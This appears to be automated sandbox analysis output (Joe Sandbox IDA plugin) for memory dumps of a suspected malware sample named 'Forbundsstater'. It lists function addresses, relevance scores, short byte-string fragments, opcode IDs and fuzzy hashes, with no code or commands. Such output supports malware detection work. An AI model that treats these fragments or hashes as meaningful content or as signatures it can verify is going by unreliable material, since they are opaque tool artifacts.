Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 0oHp$LjHp$LjHp$PHeq$PHeq
API String ID: 0-2617784740
Opcode ID: 3d70374022d99d0e6e10c6a9352c89f48e9c0b1054f53aee7547870d53fecf25
Instruction ID: 4208ffed3d17b8ddfc19fa2d0468d75588a11b0362660fbe898171c2d009e455
Opcode Fuzzy Hash: 3d70374022d99d0e6e10c6a9352c89f48e9c0b1054f53aee7547870d53fecf25
Instruction Fuzzy Hash: 4C81A374E00218DFDB18DFA9D884A9DBBF2BF88301F14D069E819AB365DB749985CF50

Function 0015B4F2 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

PHeq, xrefs: 0015B758
0oHp, xrefs: 0015B562
PHeq, xrefs: 0015B747

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 0oHp$PHeq$PHeq
API String ID: 0-4068647697
Opcode ID: 7273862882bd3a9eff3d8001e6bd0127c1eed780365e1285a00e56ab1bc10102
Instruction ID: 88facb547c4f464eb272f9ceddee0ae5c4accf8626169de96fa7ed76ef112be0
Opcode Fuzzy Hash: 7273862882bd3a9eff3d8001e6bd0127c1eed780365e1285a00e56ab1bc10102
Instruction Fuzzy Hash: C561C374E04608DFDB18DFAAC984A9DBBF2BF89301F24C069E818AB365DB745945CF50

Function 00159858 Relevance: 3.4, Strings: 2, Instructions: 859COMMON

Download Yara Rule

Strings

(oeq, xrefs: 00159C78
4'eq, xrefs: 0015A273

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: (oeq$4'eq
API String ID: 0-2258195259
Opcode ID: 2b3e29d55c3704aeeeb83b0a2306ad8b52dc610361335845e1c4c9a91e24b92d
Instruction ID: 11e20849c98eddac4b00fb9c8c9d095cb6551040028d681f7cb25cdfd89b4d30
Opcode Fuzzy Hash: 2b3e29d55c3704aeeeb83b0a2306ad8b52dc610361335845e1c4c9a91e24b92d
Instruction Fuzzy Hash: 33727370A00609DFCB15CF68C984AAEBBF2FF88312F558559E8159F2A1D730ED85CB52

Function 00156108 Relevance: 3.0, Strings: 2, Instructions: 513COMMON

Download Yara Rule

Strings

Hiq, xrefs: 0015650E
(oeq, xrefs: 00156642

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: (oeq$Hiq
API String ID: 0-1760408109
Opcode ID: 4025d6283065ba9fc1e0653614ad43a3b07258917dd39af04ed060ff8ab6ef65
Instruction ID: 802a04edba5e055edd5eb884af7cd78d8268b595cc93a5d3339ea38a0f0f6a79
Opcode Fuzzy Hash: 4025d6283065ba9fc1e0653614ad43a3b07258917dd39af04ed060ff8ab6ef65
Instruction Fuzzy Hash: D4128D70A00219CFDB14DF69C854AAEBBF6FF88301F608569E819DB395DB349D85CB90

Function 001577F0 Relevance: 28.2, Strings: 22, Instructions: 707COMMON

Download Yara Rule

Strings

.H/!, xrefs: 00157B7C
NH/!, xrefs: 00157809
.H/!, xrefs: 00157B37
.H/!, xrefs: 0015781B
$eq, xrefs: 00158337
.H/!, xrefs: 00157835
.H/!, xrefs: 001578CA
$eq, xrefs: 00158314
.H/!, xrefs: 00157AAD
.H/!, xrefs: 00157C4B
.H/!, xrefs: 00157C06
.H/!, xrefs: 00157999
.H/!, xrefs: 00157BC1
.H/!, xrefs: 00157AF2
.H/!, xrefs: 0015790F
.H/!, xrefs: 00157A68
.H/!, xrefs: 0015788E
.H/!, xrefs: 00157871
.H/!, xrefs: 00157954
.H/!, xrefs: 001579DE
.H/!, xrefs: 00157A23
.H/!, xrefs: 00157C68

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: .H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$.H/!$NH/!$$eq$$eq
API String ID: 0-2186764018
Opcode ID: bdbebd9eac61d18c33e987c3e43e07e0ece9d6f110884887251c0a755feb4a92
Instruction ID: 4a68865e652beb9be8dba4ea58c6fd34c3bf3ab781311dcc8885afbe87afc708
Opcode Fuzzy Hash: bdbebd9eac61d18c33e987c3e43e07e0ece9d6f110884887251c0a755feb4a92
Instruction Fuzzy Hash: F7523174A00218CFEB559BA4C860BEEBB72FF84300F1080A9D51A6B795DF349E85DF61

Function 00156E58 Relevance: 10.5, Strings: 8, Instructions: 477COMMON

Download Yara Rule

Strings

(oeq, xrefs: 00157367
(oeq, xrefs: 0015701A
(oeq, xrefs: 00157377
,iq, xrefs: 001572F8
(oeq, xrefs: 00156E96
(oeq, xrefs: 00156F51
(oeq, xrefs: 00156F7D
,iq, xrefs: 00157308

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: (oeq$(oeq$(oeq$(oeq$(oeq$(oeq$,iq$,iq
API String ID: 0-4181857939
Opcode ID: 8c16e87e41b0f97929cbe47725932a459d50c43eacaf748f0256c9f94296568c
Instruction ID: a960362dac93d31554a0983f7e9f397d665362ef3a90c472462df9f40b69ef15
Opcode Fuzzy Hash: 8c16e87e41b0f97929cbe47725932a459d50c43eacaf748f0256c9f94296568c
Instruction Fuzzy Hash: 54126A30A04608CFCB15DF69E885AAEBBF2FF88315F158559E819DB2A1DB30ED45CB50

Function 001587E9 Relevance: 4.3, Strings: 3, Instructions: 503COMMON

Download Yara Rule

Strings

4'eq, xrefs: 00158811
;eq, xrefs: 00158C2C
4'eq, xrefs: 00158837

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$;eq
API String ID: 0-1536740294
Opcode ID: 0dccf928d8901dc18ae77790d48ef0a7809ff5841dbba5ec68e84bd40abf8646
Instruction ID: 90301356ce99904f4420f4fd28c8c1b1542652d2b6dac06f8899a5267926a5a6
Opcode Fuzzy Hash: 0dccf928d8901dc18ae77790d48ef0a7809ff5841dbba5ec68e84bd40abf8646
Instruction Fuzzy Hash: 55F1B070314101CFDB199B29C954B3977AAEF81706F1940AAE922EF3B2EF65CC89C751

Function 001556A8 Relevance: 2.8, Strings: 2, Instructions: 326COMMON

Download Yara Rule

Strings

Hiq, xrefs: 00155793
Hiq, xrefs: 001557C6

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: Hiq$Hiq
API String ID: 0-2624443307
Opcode ID: 1b39905ff809a812ed8061d392840156a40dcf53507cb42bc2c023c0a4e9d596
Instruction ID: fe967272e297e54e8f2116f26096a26c3549a0356659ce21d8510f0218a87409
Opcode Fuzzy Hash: 1b39905ff809a812ed8061d392840156a40dcf53507cb42bc2c023c0a4e9d596
Instruction Fuzzy Hash: 45B1CE70704610CFCB159F78C864A2E7BA3AFC8316F158529E86ACF2A5DB34CC85DB91

Function 00155C08 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

,iq, xrefs: 00155CDE
,iq, xrefs: 00155CE8

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: ,iq$,iq
API String ID: 0-3242339887
Opcode ID: 75afe8786d857488c46619791b2a8974724642fade52466c4db2758380be3035
Instruction ID: 048456a7809feab6895711e48dbcf73b266f8043dded2870093aac7e9469eff0
Opcode Fuzzy Hash: 75afe8786d857488c46619791b2a8974724642fade52466c4db2758380be3035
Instruction Fuzzy Hash: EF81A435A00905CFCB18CFA9C4A89AAB7B3FF89312B258169D825DF365D731ED45CB50

Function 001595D4 Relevance: 2.7, Strings: 2, Instructions: 227COMMON

Download Yara Rule

Strings

T, xrefs: 001595E6
4'eq, xrefs: 0015966C

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 4'eq$T
API String ID: 0-2582472209
Opcode ID: 941930144bb02eaddcc06b9f4064965e17928faf5f1565bf976fe89cf15fd982
Instruction ID: 5315755f19256a521afb0eeba8891a3626ed11b685561ca3b251f9d0e6660427
Opcode Fuzzy Hash: 941930144bb02eaddcc06b9f4064965e17928faf5f1565bf976fe89cf15fd982
Instruction Fuzzy Hash: 5C81D670604245CFCB05CF68C894ABE7BB5EF85311F1985AAD815CF262D735DC4ACB92

Function 00159390 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

4'eq, xrefs: 001594CD
4'eq, xrefs: 001594E4

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq
API String ID: 0-907361030
Opcode ID: 74bac7ec63c69d81b1da5a501a1da3d25f064e2f6857ccbdec8f0b727b0b7f22
Instruction ID: 0b819f17e95e61aaa4435bed80c45c497e0dcbdb649b609a6628d4f790d56889
Opcode Fuzzy Hash: 74bac7ec63c69d81b1da5a501a1da3d25f064e2f6857ccbdec8f0b727b0b7f22
Instruction Fuzzy Hash: 5F519B31700214DFDB059F68C984BAABBE6EF88361F148469ED18CF291DB35DC46CB52

Function 00153428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xiq, xrefs: 00153435
Xiq, xrefs: 0015345E

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: Xiq$Xiq
API String ID: 0-733771754
Opcode ID: 6021b15b77996a669a9ddce951a00378b3680a791e7dbbb253ce752144f9c7ae
Instruction ID: 65c3dfd6dfb6702c863c94ec671fe5d5b6f8e7711cd966b7b05584ad1a2d230c
Opcode Fuzzy Hash: 6021b15b77996a669a9ddce951a00378b3680a791e7dbbb253ce752144f9c7ae
Instruction Fuzzy Hash: A631F771700324CBDF1D4A69899427FB5D6ABC4392F240439DC36CB380EFB4CE499651

Function 00150C8F Relevance: 1.7, Strings: 1, Instructions: 406COMMON

Download Yara Rule

Strings

LReq, xrefs: 00150E5E

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: LReq
API String ID: 0-2687900687
Opcode ID: eca9d8a2b3c9f6a3de317296a157ab271cf4d9c1eae752df8dcb651ba13fcc22
Instruction ID: 71e27b9f37531e9ce60f5c54cc8fe0236e1ea92fa1d3e1de68768a7f9bf79791
Opcode Fuzzy Hash: eca9d8a2b3c9f6a3de317296a157ab271cf4d9c1eae752df8dcb651ba13fcc22
Instruction Fuzzy Hash: A722E57494061ACFCB58DF64DC84AADBBB1FF48305F1089A9D809AB365DBB46E85CF40

Function 00150CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LReq, xrefs: 00150E5E

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: LReq
API String ID: 0-2687900687
Opcode ID: 3745e2312d8cb23a4b16f224a4f45cf8d05b358df3b2917058dd17ace6cad26f
Instruction ID: 5f6b23407dcc922186652634053ebbf02e3b9f5b0e3e61820ae946aef6b308f2
Opcode Fuzzy Hash: 3745e2312d8cb23a4b16f224a4f45cf8d05b358df3b2917058dd17ace6cad26f
Instruction Fuzzy Hash: D122D57494061ACFCB58DF64DC84AADBBB1FF48305F1089A9D809AB365DBB46E85CF40

Function 0015964C Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

4'eq, xrefs: 0015966C

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 4'eq
API String ID: 0-1552367303
Opcode ID: c3b368ae4d4922fa17ec59b6ccf11fea1ef333bc4cbeb47e95a242eb2052589f
Instruction ID: 184da1ec019f130f775b4792f5f821aa46d4de64aa48d4592310c581da1eac26
Opcode Fuzzy Hash: c3b368ae4d4922fa17ec59b6ccf11fea1ef333bc4cbeb47e95a242eb2052589f
Instruction Fuzzy Hash: 3B41A474B04105CFDB15DB69C990ABEB7AAEF98301F148566EC22DF251DB24CC498B92

Function 0015A650 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

(oeq, xrefs: 0015A7D9

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: (oeq
API String ID: 0-952175256
Opcode ID: ff7b26ccd3eae1e6ec5151f9fa743799a35bb38846474280c308a323e6e19354
Instruction ID: c2988901984347b3e2d457b17f51b3e47a8cbf1f3b34d0a1a9d1ac15014c4aab
Opcode Fuzzy Hash: ff7b26ccd3eae1e6ec5151f9fa743799a35bb38846474280c308a323e6e19354
Instruction Fuzzy Hash: 4441F2357002048FCB159B78D854AAE7BF2BFCC311F144569E916E77A2CE319D46CB91

Function 00155EA8 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

1/!, xrefs: 00155EA8

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID: 1/!
API String ID: 0-2224914054
Opcode ID: 47cef6baacaf31bd0a794fea5575bb8edcdcbd664b893c4d34730ea7b27e088d
Instruction ID: 4f5698febbceac4bc2fdedefdaeaa0c29be3ab3862676c5c3ee365371dddc23c
Opcode Fuzzy Hash: 47cef6baacaf31bd0a794fea5575bb8edcdcbd664b893c4d34730ea7b27e088d
Instruction Fuzzy Hash: 67D0C27455C3850BC713E730D9518D93F31EF80204B804A9AF8060E86BEDAC05C98B12

Function 0015A818 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df34ab630714754c1989c9097bcb038dd2e6fb52841d508ba222a1f66a2f147
Instruction ID: 0e2f6e6f7e4219bf941980aed81272b8f10efa4c066974dfb312e3241eb16259
Opcode Fuzzy Hash: 6df34ab630714754c1989c9097bcb038dd2e6fb52841d508ba222a1f66a2f147
Instruction Fuzzy Hash: 37F13B75A40115CFCB04CF6CC8849ADBBF6FF88311B5A8159E925AB361CB35EC85CB91

Function 00157438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ca01b9d65a4ed23d6971b2199e1515b3c7a2681c5296fe504cb8e55193a9d4
Instruction ID: 0fc6105152bdfe00d544c4477e9e2938eb27507ceae6e1fc0e7494d8016e23e7
Opcode Fuzzy Hash: 26ca01b9d65a4ed23d6971b2199e1515b3c7a2681c5296fe504cb8e55193a9d4
Instruction Fuzzy Hash: 81711734718605CFDB15DF28E899AA97BE6AF49302F1500A9E826CF3B1DB70DC45CB90

Function 0015CED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed90ad5a578e76996e856ba5e2b9ae102a28e356f7bcdd7e7eac3204c8543ea9
Instruction ID: 1c59427994e76a8610187e60dbd9fb16d5882640a007f15d8e0c8c20b0c88400
Opcode Fuzzy Hash: ed90ad5a578e76996e856ba5e2b9ae102a28e356f7bcdd7e7eac3204c8543ea9
Instruction Fuzzy Hash: EB518DB4025B4B9FE2402B20FDAC12ABBB5FF4F7277416D44B10FA58259F3854C9CA62

Function 0015CD10 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398c89099a797096751769e941a7a12b181db7ef7e03e37eb46abfbf063f50b
Instruction ID: d05f094a01fdfce8ecf8e0206366aace7a3d9e31119c11dfda55901eb8a8bde5
Opcode Fuzzy Hash: 7398c89099a797096751769e941a7a12b181db7ef7e03e37eb46abfbf063f50b
Instruction Fuzzy Hash: 71518174E01218DFDB48DFA9D5849DDBBF2BF89310F20916AE819AB365DB30A905CF40

Function 00153908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ac7c1684c07961452be77dceedb7e8765a4f380459ea5c2dea98bbde1dd7ef
Instruction ID: d4a41256f9cc866532619f2cd5432728ae4b5401bda5fb213a34db2c19061102
Opcode Fuzzy Hash: 16ac7c1684c07961452be77dceedb7e8765a4f380459ea5c2dea98bbde1dd7ef
Instruction Fuzzy Hash: 1851B474E01208DFCB48DFB9D5909ADBBB2FF89301B248469E815AB328DB75AD45CF50

Function 00159A63 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df170718a6e37368a69fdc000397299726308b3bc1cf4451a38f59ae3f19a23
Instruction ID: a4b22d5573b119869bad468ee672ba3f0a6e83aad573e7f50ee157de8cd545b0
Opcode Fuzzy Hash: 3df170718a6e37368a69fdc000397299726308b3bc1cf4451a38f59ae3f19a23
Instruction Fuzzy Hash: 5141D031A04249DFCF15CFA8C844A9EBFB2AF49312F148155EC259F2A1D334D958CB62

Function 00154DC8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db201e4a0625c1900f20e58d55a42b1ad57dbda61a6eab4da92bb5549da7ed
Instruction ID: b9fd9ecab58a9cfc4064cacc5660e6856a87f2167b8ad924b625f6b946300a37
Opcode Fuzzy Hash: d6db201e4a0625c1900f20e58d55a42b1ad57dbda61a6eab4da92bb5549da7ed
Instruction Fuzzy Hash: 4F316031204109EFCF059FA4D855AAE3BB6FF88305F108424FD298B295CB38DDA5DBA1

Function 001576E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e320f876194ab2d7db64b18159c467a900f0d3addd3a179bb23d94206efe8719
Instruction ID: 02d6441cc80a496576e0bb44e4644ee260212bff44d11db2ea0c7db146e54c06
Opcode Fuzzy Hash: e320f876194ab2d7db64b18159c467a900f0d3addd3a179bb23d94206efe8719
Instruction Fuzzy Hash: C221A1353082018BEB151625B99AB7A369B9FC871AF244078D916CF7D9EF65CC89A3C0

Function 00155A60 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a88114891b132b9f666d154d6d424341cf25379b2c5aefb30a7a8cbbd13c2799
Instruction ID: 906c63027be6a01b3acb56340fb1dbdcb18052952409334c2d06142b600fa564
Opcode Fuzzy Hash: a88114891b132b9f666d154d6d424341cf25379b2c5aefb30a7a8cbbd13c2799
Instruction Fuzzy Hash: 7E21C431304A11DFC7199B24C8A452E77A3EF857627158679EC1ACF365CF34DC468B80

Function 00152060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95861fcbad3a1d66a710d9e75dca71136d425631f0334add8399a281798a62f4
Instruction ID: 2ca73ab038380a9f5ae12ba23120f9f4009e91d1b03a22c420d1700d30cbb095
Opcode Fuzzy Hash: 95861fcbad3a1d66a710d9e75dca71136d425631f0334add8399a281798a62f4
Instruction Fuzzy Hash: 0121D132A00215EFCB14DB34C5409AE77A5EFD9361B20C419EC198B294DB75EE46CB81

Function 0015D11A Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19a5bb7c45d400b2912698e5ff9bbedc9432088b26bf6b151dc53fff1921619e
Instruction ID: 324f43b4d674564211df87805dcb92d80fa94378d00c6da40c291c6388d4e77e
Opcode Fuzzy Hash: 19a5bb7c45d400b2912698e5ff9bbedc9432088b26bf6b151dc53fff1921619e
Instruction Fuzzy Hash: B8212631C11619DECB10EFE8D8446ECFBB4FF4A312F509629E9547B254EB706A5ACB80

Function 0009D404 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657225499.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eef50847014f4e689e9cbc9d87987af398d4a1c367e3c839f36be52e794e4f5
Instruction ID: 7e442d64d436b152a5b0b965e15a0a1ccad84106a4260ddac8c3917da6b1d478
Opcode Fuzzy Hash: 1eef50847014f4e689e9cbc9d87987af398d4a1c367e3c839f36be52e794e4f5
Instruction Fuzzy Hash: 9C213771544240EFDF15DF14D9C0B2ABFA5FB98324F24C56AE9090F246C33AE856E7A1

Function 0015215C Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc417c97f591147b0bca808cc7a41a77cbc29f88798d3702001140ad4832ff0b
Instruction ID: ed42f0cf332684c911b825ba1ca03f6819606e4ae07bb5840ffe39b19c5b806d
Opcode Fuzzy Hash: fc417c97f591147b0bca808cc7a41a77cbc29f88798d3702001140ad4832ff0b
Instruction Fuzzy Hash: 86119232E44349DFCB069BB89C004DEBB30FF8A3217258756D522BB091EB311809C791

Function 0015D218 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b69babfeb2e6074f225a47f1df09797c01e70626012833f9d8163e3e2896622
Instruction ID: 4467a29c2a7521294f9384b3ca239e49827cb09d64f7cd5885f966cf5fc4b2a4
Opcode Fuzzy Hash: 8b69babfeb2e6074f225a47f1df09797c01e70626012833f9d8163e3e2896622
Instruction Fuzzy Hash: 0C213534941219CFCB18DFA4D850AEEB7B2FB89301F10A428D805773A4DB39A942CF64

Function 001539ED Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715d5edc81bc8556405a31f210337e395c8e113b0f11661b6aa836db5f58c5ce
Instruction ID: 85d46932c3797b5951f734961a424b35c247ccbca27e95e4baf98bb5b6f095a2
Opcode Fuzzy Hash: 715d5edc81bc8556405a31f210337e395c8e113b0f11661b6aa836db5f58c5ce
Instruction Fuzzy Hash: FE31B278E01208DFCB48DFA8D5948ADBBB2FF49301B204469E819AB328DB75AD45CF40

Function 00158EC1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04dd1cdc062c4ed641d0c725391be54a2c99b6e489e9a5af299769927cd1317c
Instruction ID: 3d01f918ac233f1d1b4071ed349e45f15b5a2aa3b55e61b2cffe8b9d6ac8b683
Opcode Fuzzy Hash: 04dd1cdc062c4ed641d0c725391be54a2c99b6e489e9a5af299769927cd1317c
Instruction Fuzzy Hash: 5E216D70A05248DFCB05CFA5D550AEEBFB2EF48302F14806AE815F6294DF349A41DF60

Function 0015D228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a746d72eed153d6356a9bd0f284f8b03e3f06c0eb648483865911c1eb0e5cd34
Instruction ID: 66e540b89acd228049175922ab7acc6532e2e04c335c34fea3bb53518d3df559
Opcode Fuzzy Hash: a746d72eed153d6356a9bd0f284f8b03e3f06c0eb648483865911c1eb0e5cd34
Instruction Fuzzy Hash: 32210334A41208CFDF18DBB4D850AEEB7B2BB8A301F10A428D805773A4DB39A945CF65

Function 00155A70 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

